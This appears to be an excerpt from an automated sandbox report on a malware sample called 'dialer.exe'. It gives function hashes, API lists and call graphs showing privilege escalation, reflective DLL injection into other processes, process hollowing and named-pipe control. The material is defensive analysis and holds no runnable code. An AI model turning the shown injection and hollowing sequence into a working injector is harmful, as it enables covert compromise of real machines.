                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: 564ea3ce2a168288f63db63f69d129bd20659fb93ab271b1718c18da0c027efe
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 2B51A132701600A6EF26EF96E44AB39B7D9F356F98F918124DA1683F8CEB34C941C704
                                                                    Function 00000224644383E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: 7db9c93f0b409a0537a57def2a8a6dbd75289ca9e52efc623648b363d20d2a1b
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: 81319371201740E6EF26EF92E84A729B7A8F752F98F958014EE5687F4CDB38C940C704
                                                                    Function 0000022464472058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction ID: e3a8063712e75396f67851cf8a850686dc90b0e270d7f4da18cb4b6b6c087b1e
                                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction Fuzzy Hash: ECD1DE32B14A80A9EB21DFA9D4492EC3BB9F3567A8F804216CE5997F9DDE34C407C740
                                                                    Function 0000022464472980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction ID: 1d953b1b96a10ed94b814bc67f93eb5914335e8821194b77ab47b3943bb794b4
                                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction Fuzzy Hash: F791AF62700650A9FF70AFA5944A3FD2BA8F756B98F944109DE0A67E9DDE34C487C700
                                                                    Function 0000022464467960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction ID: 49729d7bb665b277eecb2b7822ffcddad52ec22a5eeb45bf1ded5bc81be64f27
                                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction Fuzzy Hash: 67115622710F0199EF10DFA0EC593B833A8F71A768F841D25DA6D46F98DF78C1998380
                                                                    Function 000002246446253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction ID: 692f56f3e68a0bd5ff6f714ab354ce4cc5ee1c0b78c9aa55cc661b8b38ab7b27
                                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction Fuzzy Hash: 4F71A336300781B6EFB5BEA5984A7FA6798F386785F840026DD0957F8DDE35C545CB00
                                                                    Function 0000022464439E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: b9a811a4904848de9828876c4a615e8b4a783f40caef0dea7608102fadd4e038
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 76619A33A00B84DAEB21EFA6D0863AD77A4F745B88F444215EF4917B98DB39D195C700
                                                                    Function 0000022464462330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction ID: e7a7cc6d5d9553ddfce0acb45bd4c4f7b523b503f242fc36f51f00086c33405e
                                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction Fuzzy Hash: 4F51BE22304781B1EEB4BAAAA45E3FA679AF386784FC40125DE5913F9DDE39C5058F40
                                                                    Function 00000224644726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction ID: fb82908054afb1caaaaf5d6b9789e4cf28137658d2ed8255682dd1f129f631a6
                                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction Fuzzy Hash: E441C332314A8096DF60EF65E8493E977A5F399794F814121EE4D87B88DF3CC502CB40
                                                                    Function 00000224644694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction ID: 5ee0dbaa7f8877b56d6d057551c15bb3b376b9692e8a543f8685826078187e38
                                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction Fuzzy Hash: 46115B32204B8092EF609F15E404369B7E9F789B94F984221EE8C07B58DF3DC552CB00
                                                                    Function 0000022464437356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: 63643cc6e4e168e267e480a2cd99b37b85a2344724b3ad36efaeaf1145560883
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: 1DE0CD61640B48E0DF129FA2E8452E873A5DB59B68FC8D122DE5C47315FB38D1F9C300
                                                                    Function 00000224644373B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: 53c2d33325c437db864b7018e114f8be9fe59a8d7d9e1f122f0cf5b346041f0f
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: B3E0CD61610F44E0DF129FA2E8411A8B3A5E759B58FC8D122DE4C47315FB38D1E5C300
                                                                    Function 0000022464461BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction ID: 00a8346c149fd4590b529019f11cb06ad624b2d06a5e2815b01bdeb554bc0839
                                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction Fuzzy Hash: 9B119125701B4495EFA4EFA6A40E2397BA9FB8AFD1F985024DE4D43B69DF38C442D700
                                                                    Function 0000022464461268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction ID: c19dc6429dddcfcbbfd4e432c60524220bcaea6a7a6c5f8a103f0b70d58d5429
                                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction Fuzzy Hash: 1BE06D3560160486EB14AFA2D80D36A37E6FB8AFA6F84D024C90907755DF7D889AC750

                                                                    Execution Graph

                                                                    Execution Coverage:46.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:38.1%
                                                                    Total number of Nodes:226
                                                                    Total number of Limit Nodes:22
                                                                    execution_graph 521 140002524 522 140002531 521->522 523 140002539 521->523 524 1400010c0 30 API calls 522->524 524->523 383 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 384 140002b8e K32EnumProcesses 383->384 385 140002beb SleepEx 384->385 386 140002ba3 384->386 385->384 386->385 388 140002540 386->388 389 140002558 388->389 390 14000254d 388->390 389->386 392 1400010c0 390->392 430 1400018ac OpenProcess 392->430 395 1400014ba 395->389 396 140001122 OpenProcess 396->395 397 14000113e OpenProcess 396->397 398 140001161 K32GetModuleFileNameExW 397->398 399 1400011fd NtQueryInformationProcess 397->399 400 1400011aa CloseHandle 398->400 401 14000117a PathFindFileNameW lstrlenW 398->401 402 1400014b1 CloseHandle 399->402 403 140001224 399->403 400->399 405 1400011b8 400->405 401->400 404 140001197 StrCpyW 401->404 402->395 403->402 406 140001230 OpenProcessToken 403->406 404->400 405->399 407 1400011d8 StrCmpIW 405->407 406->402 408 14000124e GetTokenInformation 406->408 407->402 407->405 409 1400012f1 408->409 410 140001276 GetLastError 408->410 411 1400012f8 CloseHandle 409->411 410->409 412 140001281 LocalAlloc 410->412 411->402 417 14000130c 411->417 412->409 413 140001297 GetTokenInformation 412->413 414 1400012df 413->414 415 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 413->415 416 1400012e6 LocalFree 414->416 415->416 416->411 417->402 418 14000139b StrStrA 417->418 419 1400013c3 417->419 418->417 420 1400013c8 418->420 419->402 420->402 421 1400013f3 VirtualAllocEx 420->421 421->402 422 140001420 WriteProcessMemory 421->422 422->402 423 14000143b 422->423 435 14000211c 423->435 425 14000145b 425->402 426 140001478 WaitForSingleObject 425->426 429 140001471 CloseHandle 425->429 428 140001487 GetExitCodeThread 426->428 426->429 428->429 429->402 431 14000110e 430->431 432 1400018d8 IsWow64Process 430->432 431->395 431->396 433 1400018f8 CloseHandle 432->433 434 1400018ea 432->434 433->431 434->433 438 140001914 GetModuleHandleA 435->438 439 140001934 GetProcAddress 438->439 440 14000193d 438->440 439->440 441 140002bf8 442 140002c05 441->442 444 140002c25 ConnectNamedPipe 442->444 445 140002c1a Sleep 442->445 451 140001b54 AllocateAndInitializeSid 442->451 446 140002c83 Sleep 444->446 447 140002c34 ReadFile 444->447 445->442 449 140002c8e DisconnectNamedPipe 446->449 448 140002c57 WriteFile 447->448 447->449 448->449 449->444 452 140001bb1 SetEntriesInAclW 451->452 453 140001c6f 451->453 452->453 454 140001bf5 LocalAlloc 452->454 453->442 454->453 455 140001c09 InitializeSecurityDescriptor 454->455 455->453 456 140001c19 SetSecurityDescriptorDacl 455->456 456->453 457 140001c30 CreateNamedPipeW 456->457 457->453 458 140002258 461 14000226c 458->461 485 140001f2c 461->485 464 140001f2c 14 API calls 465 14000228f GetCurrentProcessId OpenProcess 464->465 466 140002321 FindResourceExA 465->466 467 1400022af OpenProcessToken 465->467 470 140002341 SizeofResource 466->470 471 140002261 ExitProcess 466->471 468 1400022c3 LookupPrivilegeValueW 467->468 469 140002318 CloseHandle 467->469 468->469 472 1400022da AdjustTokenPrivileges 468->472 469->466 470->471 473 14000235a LoadResource 470->473 472->469 474 140002312 GetLastError 472->474 473->471 475 14000236e LockResource GetCurrentProcessId 473->475 474->469 499 1400017ec GetProcessHeap HeapAlloc 475->499 477 14000238b RegCreateKeyExW 478 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 477->478 479 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 477->479 480 14000250f SleepEx 478->480 481 1400023f4 RegSetKeySecurity LocalFree 479->481 482 14000240e RegCreateKeyExW 479->482 480->480 481->482 483 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 482->483 484 14000247f RegCloseKey 482->484 483->484 484->478 486 140001f35 StrCpyW StrCatW GetModuleHandleW 485->486 487 1400020ff 485->487 486->487 488 140001f86 GetCurrentProcess K32GetModuleInformation 486->488 487->464 489 1400020f6 FreeLibrary 488->489 490 140001fb6 CreateFileW 488->490 489->487 490->489 491 140001feb CreateFileMappingW 490->491 492 140002014 MapViewOfFile 491->492 493 1400020ed CloseHandle 491->493 494 1400020e4 CloseHandle 492->494 495 140002037 492->495 493->489 494->493 495->494 496 140002050 lstrcmpiA 495->496 498 14000208e 495->498 496->495 497 140002090 VirtualProtect VirtualProtect 496->497 497->494 498->494 505 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 499->505 501 140001885 GetProcessHeap HeapFree 502 140001830 502->501 503 140001851 OpenProcess 502->503 503->502 504 140001867 TerminateProcess CloseHandle 503->504 504->502 506 140001565 505->506 507 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 505->507 506->507 508 14000157a OpenProcess 506->508 510 14000161a CloseHandle 506->510 511 1400015c9 ReadProcessMemory 506->511 507->502 508->506 509 140001597 K32EnumProcessModules 508->509 509->506 509->510 510->506 511->506 512 1400021d0 513 1400021dd 512->513 514 140001b54 6 API calls 513->514 515 1400021f2 Sleep 513->515 516 1400021fd ConnectNamedPipe 513->516 514->513 515->513 517 140002241 Sleep 516->517 518 14000220c ReadFile 516->518 519 14000224c DisconnectNamedPipe 517->519 518->519 520 14000222f 518->520 519->516 520->519 525 140002560 526 140002592 525->526 527 14000273a 525->527 528 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 526->528 529 140002598 526->529 530 140002748 527->530 531 14000297e ReadFile 527->531 532 140002633 528->532 534 140002704 528->534 535 1400025a5 529->535 536 1400026bd ExitProcess 529->536 537 140002751 530->537 538 140002974 530->538 531->532 533 1400029a8 531->533 533->532 546 1400018ac 3 API calls 533->546 534->532 548 1400010c0 30 API calls 534->548 542 1400025ae 535->542 543 140002660 RegOpenKeyExW 535->543 539 140002919 537->539 540 14000275c 537->540 541 14000175c 22 API calls 538->541 547 140001944 ReadFile 539->547 544 140002761 540->544 545 14000279d 540->545 541->532 542->532 558 1400025cb ReadFile 542->558 549 1400026a1 543->549 550 14000268d RegDeleteValueW 543->550 544->532 607 14000217c 544->607 610 140001944 545->610 551 1400029c7 546->551 553 140002928 547->553 548->534 594 1400019c4 SysAllocString SysAllocString CoInitializeEx 549->594 550->549 551->532 562 1400029db GetProcessHeap HeapAlloc 551->562 563 140002638 551->563 553->532 565 140001944 ReadFile 553->565 557 1400026a6 602 14000175c GetProcessHeap HeapAlloc 557->602 558->532 560 1400025f5 558->560 560->532 572 1400018ac 3 API calls 560->572 568 1400014d8 13 API calls 562->568 574 140002a90 4 API calls 563->574 564 1400027b4 ReadFile 564->532 569 1400027dc 564->569 570 14000293f 565->570 585 140002a14 568->585 569->532 575 1400027e9 GetProcessHeap HeapAlloc ReadFile 569->575 570->532 576 140002947 ShellExecuteW 570->576 578 140002614 572->578 574->532 580 14000290b GetProcessHeap 575->580 581 14000282d 575->581 576->532 578->532 578->563 584 140002624 578->584 579 140002a49 GetProcessHeap 582 140002a52 HeapFree 579->582 580->582 581->580 586 140002881 lstrlenW GetProcessHeap HeapAlloc 581->586 587 14000285e 581->587 582->532 588 1400010c0 30 API calls 584->588 585->579 634 1400016cc 585->634 628 140002a90 CreateFileW 586->628 587->580 614 140001c88 587->614 588->532 595 140001a11 CoInitializeSecurity 594->595 596 140001b2c SysFreeString SysFreeString 594->596 597 140001a59 CoCreateInstance 595->597 598 140001a4d 595->598 596->557 599 140001b26 CoUninitialize 597->599 600 140001a88 VariantInit 597->600 598->597 598->599 599->596 601 140001ade 600->601 601->599 603 1400014d8 13 API calls 602->603 605 14000179a 603->605 604 1400017c8 GetProcessHeap HeapFree 605->604 606 1400016cc 5 API calls 605->606 606->605 608 140001914 2 API calls 607->608 609 140002191 608->609 611 140001968 ReadFile 610->611 612 14000198b 611->612 613 1400019a5 611->613 612->611 612->613 613->532 613->564 615 140001cbb 614->615 616 140001cce CreateProcessW 615->616 618 140001e97 615->618 620 140001e62 OpenProcess 615->620 622 140001dd2 VirtualAlloc 615->622 624 140001d8c WriteProcessMemory 615->624 616->615 617 140001d2b VirtualAllocEx 616->617 617->615 619 140001d60 WriteProcessMemory 617->619 618->580 619->615 620->615 621 140001e78 TerminateProcess 620->621 621->615 622->615 623 140001df1 GetThreadContext 622->623 623->615 625 140001e09 WriteProcessMemory 623->625 624->615 625->615 626 140001e30 SetThreadContext 625->626 626->615 627 140001e4e ResumeThread 626->627 627->615 627->618 629 1400028f7 GetProcessHeap HeapFree 628->629 630 140002ada WriteFile 628->630 629->580 631 140002b1c CloseHandle 630->631 632 140002afe 630->632 631->629 632->631 633 140002b02 WriteFile 632->633 633->631 635 140001745 634->635 636 1400016eb OpenProcess 634->636 635->579 636->635 637 140001703 636->637 638 14000211c 2 API calls 637->638 639 140001723 638->639 640 14000173c CloseHandle 639->640 641 140001731 CloseHandle 639->641 640->635 641->640

                                                                    Callgraph

                                                                    Executed Functions

                                                                    Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                    • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                    • API String ID: 4177739653-1130149537
                                                                    • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                    • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                    • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                    • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                    Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                    • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                    • API String ID: 2561231171-3753927220
                                                                    • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                    • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                    • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                    • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                    Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

